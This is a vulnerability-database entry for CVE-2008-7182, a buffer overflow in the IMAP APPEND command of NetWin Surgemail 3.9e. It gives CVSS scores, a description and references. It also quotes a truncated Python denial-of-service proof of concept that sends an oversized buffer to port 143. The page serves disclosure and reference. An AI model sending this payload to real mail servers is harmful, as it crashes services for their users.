Published: 08/09/2009 Updated: 29/09/2017

CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8

VMScore: 405

Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P

Buffer overflow in the IMAP service in NetWin Surgemail 3.9e, and possibly other versions prior to 3.9g2, allows remote authenticated users to cause a denial of service (crash) and possibly execute arbitrary code via a long first argument to the APPEND command, a different vector than CVE-2008-1497 and CVE-2008-1498. NOTE: due to lack of details, it is not certain whether this is the same issue as CVE-2008-2859.

Vulnerable Product	Search on Vulmon	Subscribe to Product
netwin surgemail 3.9e

#!/usr/bin/python # # Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS # Discovered by: Travis Warren # # The IMAP service contains a buffer overflow in the APPEND command # # import socket s = socketsocket(socketAF_INET, socketSOCK_STREAM) buffer = '\x41' * 3000 sconnect(('1921680103',143)) srecv(1024) ssend(' ...

CWE-119 http://www.securityfocus.com/bid/30000 http://www.securityfocus.com/archive/1/496482 http://www.netwinsite.com/surgemail/help/updates.htm https://www.exploit-db.com/exploits/5968 https://nvd.nist.gov https://www.exploit-db.com/exploits/5968/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2008-7182

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect